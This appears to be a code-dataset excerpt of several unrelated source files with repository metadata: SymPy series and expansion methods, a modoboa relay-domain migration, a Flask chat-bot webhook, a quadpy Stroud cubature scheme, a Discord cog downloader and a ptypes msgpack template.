>>> factor(a).is_algebraic_expr()
True
See Also
========
is_rational_function()
References
==========
- http://en.wikipedia.org/wiki/Algebraic_expression
"""
if syms:
syms = set(map(sympify, syms))
else:
syms = self.free_symbols
if syms.intersection(self.free_symbols) == set([]):
# constant algebraic expression
return True
else:
return self._eval_is_algebraic_expr(syms)
###################################################################################
##################### SERIES, LEADING TERM, LIMIT, ORDER METHODS ##################
###################################################################################
def series(self, x=None, x0=0, n=6, dir="+", logx=None):
"""
Series expansion of "self" around ``x = x0`` yielding either terms of
the series one by one (the lazy series given when n=None), else
all the terms at once when n != None.
Returns the series expansion of "self" around the point ``x = x0``
with respect to ``x`` up to ``O((x - x0)**n, x, x0)`` (default n is 6).
If ``x=None`` and ``self`` is univariate, the univariate symbol will
be supplied, otherwise an error will be raised.
>>> from sympy import cos, exp
>>> from sympy.abc import x, y
>>> cos(x).series()
1 - x**2/2 + x**4/24 + O(x**6)
>>> cos(x).series(n=4)
1 - x**2/2 + O(x**4)
>>> cos(x).series(x, x0=1, n=2)
cos(1) - (x - 1)*sin(1) + O((x - 1)**2, (x, 1))
>>> e = cos(x + exp(y))
>>> e.series(y, n=2)
cos(x + 1) - y*sin(x + 1) + O(y**2)
>>> e.series(x, n=2)
cos(exp(y)) - x*sin(exp(y)) + O(x**2)
If ``n=None`` then a generator of the series terms will be returned.
>>> term=cos(x).series(n=None)
>>> [next(term) for i in range(2)]
[1, -x**2/2]
For ``dir=+`` (default) the series is calculated from the right and
for ``dir=-`` the series from the left. For smooth functions this
flag will not alter the results.
>>> abs(x).series(dir="+")
x
>>> abs(x).series(dir="-")
-x
"""
from sympy import collect, Dummy, Order, Rational, Symbol
if x is None:
syms = self.atoms(Symbol)
if not syms:
return self
elif len(syms) > 1:
raise ValueError('x must be given for multivariate functions.')
x = syms.pop()
if not self.has(x):
if n is None:
return (s for s in [self])
else:
return self
if len(dir) != 1 or dir not in '+-':
raise ValueError("Dir must be '+' or '-'")
if x0 in [S.Infinity, S.NegativeInfinity]:
dir = {S.Infinity: '+', S.NegativeInfinity: '-'}[x0]
s = self.subs(x, 1/x).series(x, n=n, dir=dir)
if n is None:
return (si.subs(x, 1/x) for si in s)
return s.subs(x, 1/x)
# use rep to shift origin to x0 and change sign (if dir is negative)
# and undo the process with rep2
if x0 or dir == '-':
if dir == '-':
rep = -x + x0
rep2 = -x
rep2b = x0
else:
rep = x + x0
rep2 = x
rep2b = -x0
s = self.subs(x, rep).series(x, x0=0, n=n, dir='+', logx=logx)
if n is None: # lseries...
return (si.subs(x, rep2 + rep2b) for si in s)
return s.subs(x, rep2 + rep2b)
# from here on it's x0=0 and dir='+' handling
if x.is_positive is x.is_negative is None or x.is_Symbol is not True:
# replace x with an x that has a positive assumption
xpos = Dummy('x', positive=True, finite=True)
rv = self.subs(x, xpos).series(xpos, x0, n, dir, logx=logx)
if n is None:
return (s.subs(xpos, x) for s in rv)
else:
return rv.subs(xpos, x)
if n is not None: # nseries handling
s1 = self._eval_nseries(x, n=n, logx=logx)
o = s1.getO() or S.Zero
if o:
# make sure the requested order is returned
ngot = o.getn()
if ngot > n:
# leave o in its current form (e.g. with x*log(x)) so
# it eats terms properly, then replace it below
if n != 0:
s1 += o.subs(x, x**Rational(n, ngot))
else:
s1 += Order(1, x)
elif ngot < n:
# increase the requested number of terms to get the desired
# number keep increasing (up to 9) until the received order
# is different than the original order and then predict how
# many additional terms are needed
for more in range(1, 9):
s1 = self._eval_nseries(x, n=n + more, logx=logx)
newn = s1.getn()
if newn != ngot:
ndo = n + (n - ngot)*more/(newn - ngot)
s1 = self._eval_nseries(x, n=ndo, logx=logx)
while s1.getn() < n:
s1 = self._eval_nseries(x, n=ndo, logx=logx)
ndo += 1
break
else:
raise ValueError('Could not calculate %s terms for %s'
% (str(n), self))
s1 += Order(x**n, x)
o = s1.getO()
s1 = s1.removeO()
else:
o = Order(x**n, x)
if (s1 + o).removeO() == s1:
o = S.Zero
try:
return collect(s1, x) + o
except NotImplementedError:
return s1 + o
else: # lseries handling
def yield_lseries(s):
"""Return terms of lseries one at a time."""
for si in s:
if not si.is_Add:
yield si
continue
# yield terms 1 at a time if possible
# by increasing order until all the
# terms have been returned
yielded = 0
o = Order(si, x)*x
ndid = 0
ndo = len(si.args)
while 1:
do = (si - yielded + o).removeO()
o *= x
if not do or do.is_Order:
continue
if do.is_Add:
ndid += len(do.args)
else:
ndid += 1
yield do
if ndid == ndo:
break
yielded += do
return yield_lseries(self.removeO()._eval_lseries(x, logx=logx))
def taylor_term(self, n, x, *previous_terms):
"""General method for the taylor term.
This method is slow, because it differentiates n-times. Subclasses can
redefine it to make it faster by using the "previous_terms".
"""
from sympy import Dummy, factorial
x = sympify(x)
_x = Dummy('x')
return self.subs(x, _x).diff(_x, n).subs(_x, x).subs(x, 0) * x**n / factorial(n)
def lseries(self, x=None, x0=0, dir='+', logx=None):
"""
Wrapper for series yielding an iterator of the terms of the series.
Note: an infinite series will yield an infinite iterator. The following,
for exaxmple, will never terminate. It will just keep printing terms
of the sin(x) series::
for term in sin(x).lseries(x):
print term
The advantage of lseries() over nseries() is that many times you are
just interested in the next term in the series (i.e. the first term for
example), but you don't know how many you should ask for in nseries()
using the "n" parameter.
See also nseries().
"""
return self.series(x, x0, n=None, dir=dir, logx=logx)
def _eval_lseries(self, x, logx=None):
# default implementation of lseries is using nseries(), and adaptively
# increasing the "n". As you can see, it is not very efficient, because
# we are calculating the series over and over again. Subclasses should
# override this method and implement much more efficient yielding of
# terms.
n = 0
series = self._eval_nseries(x, n=n, logx=logx)
if not series.is_Order:
if series.is_Add:
yield series.removeO()
else:
yield series
return
while series.is_Order:
n += 1
series = self._eval_nseries(x, n=n, logx=logx)
e = series.removeO()
yield e
while 1:
while 1:
n += 1
series = self._eval_nseries(x, n=n, logx=logx).removeO()
if e != series:
break
yield series - e
e = series
def nseries(self, x=None, x0=0, n=6, dir='+', logx=None):
"""
Wrapper to _eval_nseries if assumptions allow, else to series.
If x is given, x0 is 0, dir='+', and self has x, then _eval_nseries is
called. This calculates "n" terms in the innermost expressions and
then builds up the final series just by "cross-multiplying" everything
out.
The optional ``logx`` parameter can be used to replace any log(x) in the
returned series with a symbolic value to avoid evaluating log(x) at 0. A
symbol to use in place of log(x) should be provided.
Advantage -- it's fast, because we don't have to determine how many
terms we need to calculate in advance.
Disadvantage -- you may end up with less terms than you may have
expected, but the O(x**n) term appended will always be correct and
so the result, though perhaps shorter, will also be correct.
If any of those assumptions is not met, this is treated like a
wrapper to series which will try harder to return the correct
number of terms.
See also lseries().
Examples
========
>>> from sympy import sin, log, Symbol
>>> from sympy.abc import x, y
>>> sin(x).nseries(x, 0, 6)
x - x**3/6 + x**5/120 + O(x**6)
>>> log(x+1).nseries(x, 0, 5)
x - x**2/2 + x**3/3 - x**4/4 + O(x**5)
Handling of the ``logx`` parameter --- in the following example the
expansion fails since ``sin`` does not have an asymptotic expansion
at -oo (the limit of log(x) as x approaches 0):
>>> e = sin(log(x))
>>> e.nseries(x, 0, 6)
Traceback (most recent call last):
...
PoleError: ...
...
>>> logx = Symbol('logx')
>>> e.nseries(x, 0, 6, logx=logx)
sin(logx)
In the following example, the expansion works but gives only an Order term
unless the ``logx`` parameter is used:
>>> e = x**y
>>> e.nseries(x, 0, 2)
O(log(x)**2)
>>> e.nseries(x, 0, 2, logx=logx)
exp(logx*y)
"""
if x and not x in self.free_symbols:
return self
if x is None or x0 or dir != '+': # {see XPOS above} or (x.is_positive == x.is_negative == None):
return self.series(x, x0, n, dir)
else:
return self._eval_nseries(x, n=n, logx=logx)
def _eval_nseries(self, x, n, logx):
"""
Return terms of series for self up to O(x**n) at x=0
from the positive direction.
This is a method that should be overridden in subclasses. Users should
never call this method directly (use .nseries() instead), so you don't
have to write docstrings for _eval_nseries().
"""
from sympy.utilities.misc import filldedent
raise NotImplementedError(filldedent("""
The _eval_nseries method should be added to
%s to give terms up to O(x**n) at x=0
from the positive direction so it is available when
nseries calls it.""" % self.func)
)
def limit(self, x, xlim, dir='+'):
""" Compute limit x->xlim.
"""
from sympy.series.limits import limit
return limit(self, x, xlim, dir)
def compute_leading_term(self, x, logx=None):
"""
as_leading_term is only allowed for results of .series()
This is a wrapper to compute a series first.
"""
from sympy import Dummy, log
from sympy.series.gruntz import calculate_series
if self.removeO() == 0:
return self
if logx is None:
d = Dummy('logx')
s = calculate_series(self, x, d).subs(d, log(x))
else:
s = calculate_series(self, x, logx)
return s.as_leading_term(x)
@cacheit
def as_leading_term(self, *symbols):
"""
Returns the leading (nonzero) term of the series expansion of self.
The _eval_as_leading_term routines are used to do this, and they must
always return a non-zero value.
Examples
========
>>> from sympy.abc import x
>>> (1 + x + x**2).as_leading_term(x)
1
>>> (1/x**2 + x + x**2).as_leading_term(x)
x**(-2)
"""
from sympy import powsimp
if len(symbols) > 1:
c = self
for x in symbols:
c = c.as_leading_term(x)
return c
elif not symbols:
return self
x = sympify(symbols[0])
if not x.is_Symbol:
raise ValueError('expecting a Symbol but got %s' % x)
if x not in self.free_symbols:
return self
obj = self._eval_as_leading_term(x)
if obj is not None:
return powsimp(obj, deep=True, combine='exp')
raise NotImplementedError('as_leading_term(%s, %s)' % (self, x))
def _eval_as_leading_term(self, x):
return self
def as_coeff_exponent(self, x):
""" ``c*x**e -> c,e`` where x can be any symbolic expression.
"""
from sympy import collect
s = collect(self, x)
c, p = s.as_coeff_mul(x)
if len(p) == 1:
b, e = p[0].as_base_exp()
if b == x:
return c, e
return s, S.Zero
def leadterm(self, x):
"""
Returns the leading term a*x**b as a tuple (a, b).
Examples
========
>>> from sympy.abc import x
>>> (1+x+x**2).leadterm(x)
(1, 0)
>>> (1/x**2+x+x**2).leadterm(x)
(1, -2)
"""
from sympy import Dummy, log
l = self.as_leading_term(x)
d = Dummy('logx')
if l.has(log(x)):
l = l.subs(log(x), d)
c, e = l.as_coeff_exponent(x)
if x in c.free_symbols:
from sympy.utilities.misc import filldedent
raise ValueError(filldedent("""
cannot compute leadterm(%s, %s). The coefficient
should have been free of x but got %s""" % (self, x, c)))
c = c.subs(d, log(x))
return c, e
def as_coeff_Mul(self, rational=False):
"""Efficiently extract the coefficient of a product. """
return S.One, self
def as_coeff_Add(self):
"""Efficiently extract the coefficient of a summation. """
return S.Zero, self
def fps(self, x=None, x0=0, dir=1, hyper=True, order=4, rational=True,
full=False):
"""
Compute formal power power series of self.
See the docstring of the :func:`fps` function in sympy.series.formal for
more information.
"""
from sympy.series.formal import fps
return fps(self, x, x0, dir, hyper, order, rational, full)
def fourier_series(self, limits=None):
"""Compute fourier sine/cosine series of self.
See the docstring of the :func:`fourier_series` in sympy.series.fourier
for more information.
"""
from sympy.series.fourier import fourier_series
return fourier_series(self, limits)
###################################################################################
##################### DERIVATIVE, INTEGRAL, FUNCTIONAL METHODS ####################
###################################################################################
def diff(self, *symbols, **assumptions):
new_symbols = list(map(sympify, symbols)) # e.g. x, 2, y, z
assumptions.setdefault("evaluate", True)
return Derivative(self, *new_symbols, **assumptions)
###########################################################################
###################### EXPRESSION EXPANSION METHODS #######################
###########################################################################
# Relevant subclasses should override _eval_expand_hint() methods. See
# the docstring of expand() for more info.
def _eval_expand_complex(self, **hints):
real, imag = self.as_real_imag(**hints)
return real + S.ImaginaryUnit*imag
@staticmethod
def _expand_hint(expr, hint, deep=True, **hints):
"""
Helper for ``expand()``. Recursively calls ``expr._eval_expand_hint()``.
Returns ``(expr, hit)``, where expr is the (possibly) expanded
``expr`` and ``hit`` is ``True`` if ``expr`` was truly expanded and
``False`` otherwise.
"""
hit = False
# XXX: Hack to support non-Basic args
# |
# V
if deep and getattr(expr, 'args', ()) and not expr.is_Atom:
sargs = []
for arg in expr.args:
arg, arghit = Expr._expand_hint(arg, hint, **hints)
hit |= arghit
sargs.append(arg)
if hit:
expr = expr.func(*sargs)
if hasattr(expr, hint):
newexpr = getattr(expr, hint)(**hints)
if newexpr != expr:
return (newexpr, True)
return (expr, hit)
@cacheit
def expand(self, deep=True, modulus=None, power_base=True, power_exp=True,
mul=True, log=True, multinomial=True, basic=True, **hints):
"""
Expand an expression using hints.
See the docstring of the expand() function in sympy.core.function for
more information.
"""
from sympy.simplify.radsimp import fraction
hints.update(power_base=power_base, power_exp=power_exp, mul=mul,
log=log, multinomial=multinomial, basic=basic)
expr = self
if hints.pop('frac', False):
n, d = [a.expand(deep=deep, modulus=modulus, **hints)
for a in fraction(self)]
return n/d
elif hints.pop('denom', False):
n, d = fraction(self)
return n/d.expand(deep=deep, modulus=modulus, **hints)
elif hints.pop('numer', False):
n, d = fraction(self)
return n.expand(deep=deep, modulus=modulus, **hints)/d
# Although the hints are sorted here, an earlier hint may get applied
# at a given node in the expression tree before another because of how
# the hints are applied. e.g. expand(log(x*(y + z))) -> log(x*y +
# x*z) because while applying log at the top level, log and mul are
# applied at the deeper level in the tree so that when the log at the
# upper level gets applied, the mul has already been applied at the
# lower level.
# Additionally, because hints are only applied once, the expression
# may not be expanded all the way. For example, if mul is applied
# before multinomial, x*(x + 1)**2 won't be expanded all the way. For
# now, we just use a special case to make multinomial run before mul,
# so that at least polynomials will be expanded all the way. In the
# future, smarter heuristics should be applied.
# TODO: Smarter heuristics
def _expand_hint_key(hint):
"""Make multinomial come before mul"""
if hint == 'mul':
return 'mulz'
return hint
for hint in sorted(hints.keys(), key=_expand_hint_key):
use_hint = hints[hint]
if use_hint:
hint = '_eval_expand_' + hint
expr, hit = Expr._expand_hint(expr, hint, deep=deep, **hints)
while True:
was = expr
if hints.get('multinomial', False):
expr, _ = Expr._expand_hint(
expr, '_eval_expand_multinomial', deep=deep, **hints)
if hints.get('mul', False):
expr, _ = Expr._expand_hint(
expr, '_eval_expand_mul', deep=deep, **hints)
if hints.get('log', False):
expr, _ = Expr._expand_hint(
expr, '_eval_expand_log', deep=deep, **hints)
if expr == was:
break
if modulus is not None:
modulus = sympify(modulus)
if not modulus.is_Integer or modulus <= 0:
raise ValueError(
"modulus must be a positive integer, got %s" % modulus)
terms = []
for term in Add.make_args(expr):
coeff, tail = term.as_coeff_Mul(rational=True)
coeff %= modulus
if coeff:
terms.append(coeff*tail)
expr = Add(*terms)
return expr
###########################################################################
################### GLOBAL ACTION VERB WRAPPER METHODS ####################
###########################################################################
def integrate(self, *args, **kwargs):
"""See the integrate function in sympy.integrals"""
from sympy.integrals import integrate
return integrate(self, *args, **kwargs)
def simplify(self, ratio=1.7, measure=None):
"""See the simplify function in sympy.simplify"""
from sympy.simplify import simplify
from sympy.core.function import count_ops
measure = measure or count_ops
return simplify(self, ratio, measure)
def nsimplify(self, constants=[], tolerance=None, full=False):
"""See the nsimplify function in sympy.simplify"""
from sympy.simplify import nsimplify
return nsimplify(self, constants, tolerance, full)
def separate(self, deep=False, force=False):
"""See the separate function in sympy.simplify"""
from sympy.core.function import expand_power_base
return expand_power_base(self, deep=deep, force=force)
def collect(self, syms, func=None, evaluate=True, exact=False, distribute_order_term=True):
"""See the collect function in sympy.simplify"""
from sympy.simplify import collect
return collect(self, syms, func, evaluate, exact, distribute_order_term)
def together(self, *args, **kwargs):
"""See the together function in sympy.polys"""
from sympy.polys import together
return together(self, *args, **kwargs)
def apart(self, x=None, **args):
"""See the apart function in sympy.polys"""
from sympy.polys import apart
return apart(self, x, **args)
def ratsimp(self):
"""See the ratsimp function in sympy.simplify"""
from sympy.simplify import ratsimp
return ratsimp(self)
def trigsimp(self, **args):
"""See the trigsimp function in sympy.simplify"""
from sympy.simplify import trigsimp
return trigsimp(self, **args)
def radsimp(self):
"""See the radsimp function in sympy.simplify"""
from sympy.simplify import radsimp
return radsimp(self)
def powsimp(self, deep=False, combine='all'):
"""See the powsimp function in sympy.simplify"""
from sympy.simplify import powsimp
return powsimp(self, deep, combine)
def combsimp(self):
"""See the combsimp function in sympy.simplify"""
from sympy.simplify import combsimp
return combsimp(self)
def factor(self, *gens, **args):
"""See the factor() function in sympy.polys.polytools"""
from sympy.polys import factor
return factor(self, *gens, **args)
def refine(self, assumption=True):
"""See the refine function in sympy.assumptions"""
from sympy.assumptions import refine
return refine(self, assumption)
def cancel(self, *gens, **args):
"""See the cancel function in sympy.polys"""
from sympy.polys import cancel
return cancel(self, *gens, **args)
def invert(self, g, *gens, **args):
"""Return the multiplicative inverse of ``self`` mod ``g``
where ``self`` (and ``g``) may be symbolic expressions).
See Also
========
sympy.core.numbers.mod_inverse, sympy.polys.polytools.invert
"""
from sympy.polys.polytools import invert
from sympy.core.numbers import mod_inverse
if self.is_number and getattr(g, 'is_number', True):
return mod_inverse(self, g)
return invert(self, g, *gens, **args)
def round(self, p=0):
"""Return x rounded to the given decimal place.
If a complex number would results, apply round to the real
and imaginary components of the number.
Examples
========
>>> from sympy import pi, E, I, S, Add, Mul, Number
>>> S(10.5).round()
11.
>>> pi.round()
3.
>>> pi.round(2)
3.14
>>> (2*pi + E*I).round()
6. + 3.*I
The round method has a chopping effect:
>>> (2*pi + I/10).round()
6.
>>> (pi/10 + 2*I).round()
2.*I
>>> (pi/10 + E*I).round(2)
0.31 + 2.72*I
Notes
=====
Do not confuse the Python builtin function, round, with the
SymPy method of the same name. The former always returns a float
(or raises an error if applied to a complex value) while the
latter returns either a Number or a complex number:
>>> isinstance(round(S(123), -2), Number)
False
>>> isinstance(S(123).round(-2), Number)
True
>>> isinstance((3*I).round(), Mul)
True
>>> isinstance((1 + 3*I).round(), Add)
True
"""
from sympy import Float
x = self
if x.is_number and not x.is_Atom:
xn = x.n(2)
if not pure_complex(xn, or_real=True):
raise TypeError('Expected a number but got %s:' %
getattr(getattr(x,'func', x), '__name__', type(x)))
elif x in (S.NaN, S.Infinity, S.NegativeInfinity, S.ComplexInfinity):
return x
if not x.is_real:
i, r = x.as_real_imag()
return i.round(p) + S.ImaginaryUnit*r.round(p)
if not x:
return x
p = int(p)
precs = [f._prec for f in x.atoms(Float)]
dps = prec_to_dps(max(precs)) if precs else None
mag_first_dig = _mag(x)
allow = digits_needed = mag_first_dig + p
if dps is not None and allow > dps:
allow = dps
mag = Pow(10, p) # magnitude needed to bring digit p to units place
xwas = x
x += 1/(2*mag) # add the half for rounding
i10 = 10*mag*x.n((dps if dps is not None else digits_needed) + 1)
if i10.is_negative:
x = xwas - 1/(2*mag) # should have gone the other way
i10 = 10*mag*x.n((dps if dps is not None else digits_needed) + 1)
rv = -(Integer(-i10)//10)
else:
rv = Integer(i10)//10
q = 1
if p > 0:
q = mag
elif p < 0:
rv /= mag
rv = Rational(rv, q)
if rv.is_Integer:
# use str or else it won't be a float
return Float(str(rv), digits_needed)
else:
if not allow and rv > self:
allow += 1
return Float(rv, allow)
class AtomicExpr(Atom, Expr):
"""
A parent class for object which are both atoms and Exprs.
For example: Symbol, Number, Rational, Integer, ...
But not: Add, Mul, Pow, ...
"""
is_number = False
is_Atom = True
__slots__ = []
def _eval_derivative(self, s):
if self == s:
return S.One
return S.Zero
def _eval_is_polynomial(self, syms):
return True
def _eval_is_rational_function(self, syms):
return True
def _eval_is_algebraic_expr(self, syms):
return True
def _eval_nseries(self, x, n, logx):
return self
def _mag(x):
"""Return integer ``i`` such that .1 <= x/10**i < 1
Examples
========
>>> from sympy.core.expr import _mag
>>> from sympy import Float
>>> _mag(Float(.1))
0
>>> _mag(Float(.01))
-1
>>> _mag(Float(1234))
4
"""
from math import log10, ceil, log
from sympy import Float
xpos = abs(x.n())
if not xpos:
return S.Zero
try:
mag_first_dig = int(ceil(log10(xpos)))
except (ValueError, OverflowError):
mag_first_dig = int(ceil(Float(mpf_log(xpos._mpf_, 53))/log(10)))
# check that we aren't off by 1
if (xpos/10**mag_first_dig) >= 1:
assert 1 <= (xpos/10**mag_first_dig) < 10
mag_first_dig += 1
return mag_first_dig
from .mul import Mul
from .add import Add
from .power import Pow
from .function import Derivative, Function
from .mod import Mod
from .exprtools import factor_terms
from .numbers import Integer, Rational
|
bsd-3-clause
| -4,040,034,916,984,503,000
| 33.72596
| 109
| 0.514558
| false
| 4.006842
| false
| false
| false
|
modoboa/modoboa
|
modoboa/relaydomains/migrations/0008_auto_20171123_1653.py
|
1
|
1588
|
# Generated by Django 1.10.7 on 2017-11-23 15:53
from django.db import migrations
def move_relaydomain_to_transport(apps, schema_editor):
"""Transform relaydomains to transports."""
RelayDomain = apps.get_model("relaydomains", "RelayDomain")
RecipientAccess = apps.get_model("relaydomains", "RecipientAccess")
Transport = apps.get_model("transport", "Transport")
ra_to_create = []
for rd in RelayDomain.objects.select_related("domain", "service"):
next_hop = "[{}]:{}".format(rd.target_host, rd.target_port)
tr = Transport.objects.create(
pattern=rd.domain.name,
service="relay",
next_hop=next_hop,
_settings={
"relay_target_host": rd.target_host,
"relay_target_port": rd.target_port,
"relay_verify_recipients": rd.verify_recipients
}
)
rd.domain.transport = tr
rd.domain.save(update_fields=["transport"])
if not rd.verify_recipients:
continue
ra_to_create.append(
RecipientAccess(
pattern=rd.domain.name, action="reject_unverified_recipient"))
RecipientAccess.objects.bulk_create(ra_to_create)
def forward(apps, schema_editor):
"""Empty."""
pass
class Migration(migrations.Migration):
dependencies = [
('relaydomains', '0007_recipientaccess'),
('transport', '0001_initial'),
('admin', '0011_domain_transport'),
]
operations = [
migrations.RunPython(move_relaydomain_to_transport, forward)
]
|
isc
| -2,182,599,120,591,932,700
| 32.083333
| 78
| 0.611461
| false
| 3.950249
| false
| false
| false
|
Akash334/bot
|
app.py
|
1
|
2474
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib
import json
import os
import re
from flask import Flask
from flask import request
from flask import make_response
from random import randint
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print 'Request:'
print json.dumps(req, indent=4)
res = processRequest(req)
res = json.dumps(res, indent=4)
# print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def processRequest(req):
if req.get('result').get('action') != 'yahooWeatherForecast':
return {}
data = "this is the response from webhook"
res = makeWebhookResult(data)
return res
def makeWebhookResult(data):
number=randint(1,15)
charnumber='1'
speech = "This is the response from server" + "and" + str(number)
print(speech)
print("Here is your question!")
message= {
"attachment":{
"type":"template",
"payload":{
"template_type":"generic",
"elements":[{
"title":"Get Real",
"image_url":"https://www.getreal.life/images/qus"+str(number)+".png",
"buttons":[
{
"type":"element_share"
}
]
}
]
}
},
"quick_replies": [
{
"content_type":"text",
"title": "Ask Me",
"payload": "Ask Me"
},
{
"content_type":"text",
"title": "Ask Bot",
"payload": "Ask Bot"
},
{
"content_type":"text",
"title": "Download App",
"payload": "Download App"
},
{
"content_type":"text",
"title": "50 Power Questions",
"payload": "50 Power Questions"
},
{
"content_type":"location"
}
]
}
return {
"speech": speech,
"displayText": speech,
"data": {"facebook": message}
# "contextOut": [],
#"source": "apiai-weather-webhook-sample"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print 'Starting app on port %d' % port
app.run(debug=False, port=port, host='0.0.0.0')
|
apache-2.0
| -7,652,880,332,143,322,000
| 22.121495
| 83
| 0.494745
| false
| 3.709145
| false
| false
| false
|
nschloe/quadpy
|
src/quadpy/cn/_stroud_1957.py
|
1
|
1501
|
import numpy as np
from sympy import Rational as frac
from sympy import cos, pi, sin, sqrt
from ..helpers import article, untangle
from ._helpers import CnScheme, _s
_source = article(
authors=["A.H. Stroud"],
title="Remarks on the Disposition of Points in Numerical Integration Formulas",
journal="Mathematical Tables and Other Aids to Computation",
volume="11",
number="60",
month="oct",
year="1957",
pages="257-261",
url="https://doi.org/10.2307/2001945",
)
def stroud_1957_2(n):
r = sqrt(3) / 6
data = [
(1.0, np.array([np.full(n, 2 * r)])),
(+r, _s(n, -1, r)),
(-r, _s(n, +1, r)),
]
points, weights = untangle(data)
points = np.ascontiguousarray(points.T)
return CnScheme("Stroud 1957-2", n, weights, points, 2, _source, 1.511e-14)
def stroud_1957_3(n):
n2 = n // 2 if n % 2 == 0 else (n - 1) // 2
i_range = range(1, 2 * n + 1)
pts = [
[
[sqrt(frac(2, 3)) * cos((2 * k - 1) * i * pi / n) for i in i_range],
[sqrt(frac(2, 3)) * sin((2 * k - 1) * i * pi / n) for i in i_range],
]
for k in range(1, n2 + 1)
]
if n % 2 == 1:
sqrt3pm = np.full(2 * n, 1 / sqrt(3))
sqrt3pm[1::2] *= -1
pts.append(sqrt3pm)
pts = np.vstack(pts).T
data = [(frac(1, 2 * n), pts)]
points, weights = untangle(data)
points = np.ascontiguousarray(points.T)
return CnScheme("Stroud 1957-3", n, weights, points, 3, _source)
|
mit
| -844,945,079,170,114,800
| 26.796296
| 83
| 0.545636
| false
| 2.784787
| false
| false
| false
|
logicaloperate/Project-Apollo
|
cogs/downloader.py
|
1
|
6114
|
import discord
from discord.ext import commands
from .utils.dataIO import fileIO
from .utils import checks
from .utils.chat_formatting import box
from __main__ import send_cmd_help, set_cog
import os
from subprocess import call, Popen
from distutils.dir_util import copy_tree
import shutil
import asyncio
class Downloader:
"""Cog downloader/installer."""
def __init__(self, bot):
self.bot = bot
self.path = "data/downloader/cogs/"
@commands.group(pass_context=True)
@checks.is_owner()
async def cog(self, ctx):
"""Additional cogs management"""
if ctx.invoked_subcommand is None:
await send_cmd_help(ctx)
@cog.command(name="list")
async def _send_list(self):
"""Lists installable cogs"""
index = await self.make_index()
msg = "Available cogs:\n\n"
for cog in index.keys():
if not index[cog]["DISABLED"]:
msg += cog + "\t" + index[cog]["NAME"] + "\n"
await self.bot.say(box(msg)) # Need to deal with over 2000 characters
@cog.command()
async def info(self, cog : str):
"""Shows info about the specified cog"""
cogs = self.list_cogs()
info_file = self.path + cog + "/info.json"
if cog in cogs:
if os.path.isfile(info_file):
data = fileIO(info_file, "load")
msg = "{} by {}\n\n".format(cog, data["AUTHOR"])
msg += data["NAME"] + "\n\n" + data["DESCRIPTION"]
await self.bot.say(box(msg))
else:
await self.bot.say("The specified cog has no info file.")
else:
await self.bot.say("That cog doesn't exist. Use cog list to see the full list.")
@cog.command(hidden=True)
async def search(self, *terms : str):
"""Search installable cogs"""
pass #TO DO
@cog.command(pass_context=True)
async def update(self, ctx):
"""Updates cogs"""
self.update_repo()
await self.bot.say("Downloading updated cogs. Wait 10 seconds...")
await asyncio.sleep(10) # TO DO: Wait for the result instead, without being blocking.
downloadable_cogs = self.list_cogs()
all_cogs = [f.replace(".py", "") for f in os.listdir("cogs/") if f.endswith(".py")]
installed_user_cogs = [f for f in all_cogs if f in downloadable_cogs]
for cog in installed_user_cogs:
result = await self.install(cog)
await self.bot.say("Cogs updated. Reload all installed cogs? (yes/no)")
answer = await self.bot.wait_for_message(timeout=15, author=ctx.message.author)
if answer is None:
await self.bot.say("Ok then, you can reload cogs with `{}reload <cog_name>`".format(ctx.prefix))
elif answer.content.lower().strip() in ["yes", "y"]:
for cog in installed_user_cogs:
self.bot.unload_extension("cogs." + cog)
self.bot.load_extension("cogs." + cog)
await self.bot.say("Done.")
else:
await self.bot.say("Ok then, you can reload cogs with `{}reload <cog_name>`".format(ctx.prefix))
@cog.command(name="install", pass_context=True)
async def _install(self, ctx, cog : str):
"""Installs specified cog"""
install_cog = await self.install(cog)
if install_cog:
await self.bot.say("Installation completed. Load it now? (yes/no)")
answer = await self.bot.wait_for_message(timeout=15, author=ctx.message.author)
if answer is None:
await self.bot.say("Ok then, you can load it with `{}load {}`".format(ctx.prefix, cog))
elif answer.content.lower().strip() in ["yes", "y"]:
set_cog("cogs." + cog, True)
self.bot.unload_extension("cogs." + cog)
self.bot.load_extension("cogs." + cog)
await self.bot.say("Done.")
else:
await self.bot.say("Ok then, you can load it with `{}load {}`".format(ctx.prefix, cog))
elif install_cog == False:
await self.bot.say("Invalid cog. Installation aborted.")
else:
await self.bot.say("That cog doesn't exist. Use cog list to see the full list.")
async def make_index(self):
cogs = self.list_cogs()
index = {}
if not cogs:
await self.bot.say("There are no cogs available for installation.")
return
for cog in cogs:
if os.path.isfile(self.path + cog + "/info.json"):
info = fileIO(self.path + cog + "/info.json", "load")
index[cog] = info
# Sort by alphabetic order?
return index
async def install(self, cog):
cogs = self.list_cogs()
cog = cog.lower()
if not cog in cogs:
return None
files = [f for f in os.listdir(self.path + cog) if os.path.isfile(self.path + cog + "/" + f)] # Listing all files (not dirs) in the cog directory
cog_file = [f for f in files if f.endswith(".py")] #Verifying the presence of a single py file
if len(cog_file) != 1:
return False
cog_file = cog_file[0]
print("Copying {}...".format(cog_file))
shutil.copy(self.path + cog + "/" + cog_file, "cogs/")
cog_data_path = self.path + cog + "/data"
if os.path.exists(cog_data_path):
print("Copying {}'s data folder...".format(cog))
copy_tree(cog_data_path, "data/" + cog)
return True
def list_cogs(self):
dirs = [d for d in os.listdir(self.path) if os.path.exists(self.path + d)]
return dirs
def update_repo(self):
if not os.path.exists("data/downloader"):
print("Downloading cogs repo...")
call(["git", "clone", "https://github.com/Twentysix26/Red-Cogs.git", "data/downloader"]) # It's blocking but it shouldn't matter
else:
Popen(["git", "-C", "data/downloader", "pull", "-q"])
def setup(bot):
n = Downloader(bot)
n.update_repo()
bot.add_cog(n)
|
gpl-3.0
| 4,744,360,861,402,750,000
| 40.598639
| 153
| 0.570985
| false
| 3.592244
| false
| false
| false
|
arizvisa/syringe
|
template/protocol/mp.py
|
1
|
13773
|
import ptypes
from ptypes import *
ptypes.setbyteorder(ptypes.config.byteorder.bigendian)
### definitions
class bit0(ptype.definition): cache = {}
class bit1(ptype.definition): cache = {}
class bit2container(ptype.definition): cache = {}
class bit2msgtype(ptype.definition): cache = {}
class bit3arraymap(ptype.definition): cache = {}
class d_packet(ptype.definition): cache = {}
### packet
class packet(pstruct.type):
_fields_ = [
(lambda s: t_packet, 'type'),
(lambda s: d_packet.lookup(s['type'].li.PackedType()), 'data'),
]
